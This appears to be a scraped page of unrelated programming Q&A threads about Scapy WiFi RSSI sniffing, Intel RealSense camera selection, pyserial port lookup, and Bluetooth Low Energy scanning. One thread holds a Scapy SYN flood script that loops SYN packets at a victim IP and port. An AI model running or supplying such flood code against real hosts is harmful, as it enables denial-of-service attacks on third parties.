When I try to get Rssi information from my around wireless network with Scapy , I'm getting some error. Also , I am using ALFA-036NH , my monitor mode is open and OS is Kali Linux. I used below codes :
from scapy.all import *
from datetime import datetime
import os
import signal
import sys
def PacketHandler(pkt) :
if pkt.haslayer(Dot11) :
if pkt.type == 0 and pkt.subtype == 8 :
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
try:
extra = pkt.notdecoded
rssi = -(256 - ord(extra[-4:-3]))
except:
rssi = -100
print "WiFi signal strength:", rssi
sniff(iface="wlan0mon", prn = PacketHandler)
However, all of networks giving -100 dbm. Thanks for your interest.
Please retry using the latest scapy github version (or 2.4.1+). It has improved support for RSSI, which is now available (if present), via the dBm_AntSignal field.
pkt.dBm_AntSignal
You don’t need the function you provided.
PS: where did you find such code ? Did you do it yourself? Thanks
Related
I've 2 Intel realsense D415. I'm Using a NUC with Xubuntu 16.04 and python 3.5.2.
I can find only this documentation and examples: https://github.com/IntelRealSense/librealsense/tree/master/wrappers/python
My problem is that I need to select the camera to use by serial number to be sure to select everytime the same camera.
import pyrealsense2 as rs
pipeline = rs.pipeline()
config = rs.config()
profile = config.resolve(pipeline)
profile = config.resolve(pipeline)
print(profile.get_device())
This code print this: < pyrealsense2.device: Intel RealSense D415 (S/N: 805212060066) >
I need to check the S/N and in case it's not the right one, I would need to pass to the second camera, then the third....
I would need a guide or a documentation about pyrealsense2 but I don't think it exists
EDIT - I found a solution:
import pyrealsense2 as rs
ctx = rs.context()
if len(ctx.devices) > 0:
for d in ctx.devices:
print ('Found device: ', \
d.get_info(rs.camera_info.name), ' ', \
d.get_info(rs.camera_info.serial_number))
else:
print("No Intel Device connected")
You can specify device serial number in config.
config = re.config()
config.enable_device('805212060066')
profile = config.resolve(pipeline)
I am writing code for synflood attack but when I run the file via python I get errors.
SYNFlood.py file:
import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
target_ip = sys.argv[1] # the ip of the victim machine
target_port = sys.argv[2] # the port of the victim machine
print ("ip "+target_ip+" port "+target_port)
send(IP(src="192.168.x.x", dst="target_ip")/TCP(sport=135,dport=target_port), count=2000)
But when I am running the file with:
python SYNFlood.py target_ip target_port
I get the following error:
I have tried to alter the code as the following:
while (1==1):
p=IP(dst=target_ip,id=1111,ttl=99)/TCP(sport=RandShort(),dport=int(target_port) ,seq=12345,ack=1000,window=1000,flags="S")
send(p, count=10)
But even if on cmd I get
when I run on target pc the command netstat -A I dont see syn_recv packets.
I have tried with
send(p, verbose=0, count=10)
but I dont have any output neither on dst pc nor src pc with respective commands.
Try reinstalling scapy or scapy3k. This sounds like a build issue. Confirm you are using the correct scapy version.
I figured out that I had to run the program on windows 32-bit version.
I am trying to use scapy to sniff out wireless access points, but whenever I run the script nothing is printed and I get a Segmentation Fault: 11
I am using Python 3.4 and am running OSX
Here is my code(Its fairly common - used from tutorials on other sites):
import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
ap_list = []
d = {'counter' : 0}
def PacketHandler(pkt):
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype == 8:
d['counter'] += 1
if d['counter']>500:
sys.exit()
if pkt.addr2 not in ap_list:
ap_list.append(pkt.addr2)
print("AP MAC: %s with SSID: %s" %(pkt.addr2, pkt.info))
sniff(iface = "en0", prn = PacketHandler)
To sniff scapy requires to run as sudo.
I have a script built (Windows 7, Python 2.7) to list the serial ports but I'm looking for a device with a specific name.
My script:
import serial.tools.list_ports
ports = list(serial.tools.list_ports.comports())
for p in ports:
print(p)
This returns:
COM3 - Intel(R) Active Management Technology - SOL (COM3)
COM6 - MyCDCDevice (COM6)
COM1 - Communications Port (COM1)
>>>
Great! However, I want this script to automatically pick out MyCDCDevice from the bunch and connect to it.
I tried:
import serial.tools.list_ports
ports = list(serial.tools.list_ports.comports())
for p in ports:
if 'MyCDCDevice' in p:
print(p)
// do connection stuff to COM6
But that doesn't work. I suspect because p isn't exactly a string, but an object of some sort?
Anyways, what's the correct way to go about this?
Thanks!!
I know this post is very old, but I thought I would post my findings since there was no 'accepted' answer (better late than never).
This documentation helped with determining members of the object, and I eventually came to this solution.
import serial.tools.list_ports
ports = list(serial.tools.list_ports.comports())
for p in ports:
if 'MyCDCDevice' in p.description:
print(p)
# Connection to port
s = serial.Serial(p.device)
To further extend on this, I've found it safer to make use of the PID and VID of the device in question.
import serial.tools.list_ports
# FTDI FT232 device (http://www.linux-usb.org/usb.ids)
pid="0403"
hid="6001"
my_comm_port = None
ports = list(serial.tools.list_ports.comports())
for p in ports:
if pid and hid in p.hwid:
my_comm_port = p.device
Better still, you can use the serial number of the device for the lookup, just in case you have 2 of the same device plugged in.
(Source)
You can use serial.tools.list_ports.grep, which searches all of the description fields for you. For example:
from serial.tools import list_ports
try:
cdc = next(list_ports.grep("MyCDCDevice"))
# Do connection stuff on cdc
except StopIteration:
print "No device found"
If that doesn't work, you may try adding a * to the end of the string you pass to grep in case there are extra characters in the descriptor.
Is it possible for this code to be modified to include Bluetooth Low Energy devices as well? https://code.google.com/p/pybluez/source/browse/trunk/examples/advanced/inquiry-with-rssi.py?r=1
I can find devices like my phone and other bluetooth 4.0 devices, but not any BLE. If this cannot be modified, is it possible to run the hcitool lescan and pull the data from hci dump within python? I can use the tools to see the devices I am looking for and it gives an RSSI in hcidump, which is what my end goal is. To get a MAC address and RSSI from the BLE device.
Thanks!
As I said in the comment, that library won't work with BLE.
Here's some example code to do a simple BLE scan:
import sys
import os
import struct
from ctypes import (CDLL, get_errno)
from ctypes.util import find_library
from socket import (
socket,
AF_BLUETOOTH,
SOCK_RAW,
BTPROTO_HCI,
SOL_HCI,
HCI_FILTER,
)
if not os.geteuid() == 0:
sys.exit("script only works as root")
btlib = find_library("bluetooth")
if not btlib:
raise Exception(
"Can't find required bluetooth libraries"
" (need to install bluez)"
)
bluez = CDLL(btlib, use_errno=True)
dev_id = bluez.hci_get_route(None)
sock = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI)
sock.bind((dev_id,))
err = bluez.hci_le_set_scan_parameters(sock.fileno(), 0, 0x10, 0x10, 0, 0, 1000);
if err < 0:
raise Exception("Set scan parameters failed")
# occurs when scanning is still enabled from previous call
# allows LE advertising events
hci_filter = struct.pack(
"<IQH",
0x00000010,
0x4000000000000000,
0
)
sock.setsockopt(SOL_HCI, HCI_FILTER, hci_filter)
err = bluez.hci_le_set_scan_enable(
sock.fileno(),
1, # 1 - turn on; 0 - turn off
0, # 0-filtering disabled, 1-filter out duplicates
1000 # timeout
)
if err < 0:
errnum = get_errno()
raise Exception("{} {}".format(
errno.errorcode[errnum],
os.strerror(errnum)
))
while True:
data = sock.recv(1024)
# print bluetooth address from LE Advert. packet
print(':'.join("{0:02x}".format(x) for x in data[12:6:-1]))
I had to piece all of that together by looking at the hcitool and gatttool source code that comes with Bluez. The code is completely dependent on libbluetooth-dev so you'll have to make sure you have that installed first.
A better way would be to use dbus to make calls to bluetoothd, but I haven't had a chance to research that yet. Also, the dbus interface is limited in what you can do with a BLE connection after you make one.
EDIT:
Martin Tramšak pointed out that in Python 2 you need to change the last line to print(':'.join("{0:02x}".format(ord(x)) for x in data[12:6:-1]))
You could also try pygattlib. It can be used to discover devices, and (currently) there is a basic support for reading/writing characteristics. No RSSI for now.
You could discover using the following snippet:
from gattlib import DiscoveryService
service = DiscoveryService("hci0")
devices = service.discover(2)
DiscoveryService accepts the name of the device, and the method discover accepts a timeout (in seconds) for waiting responses. devices is a dictionary, with BL address as keys, and names as values.
pygattlib is packaged for Debian (or Ubuntu), and also available as a pip package.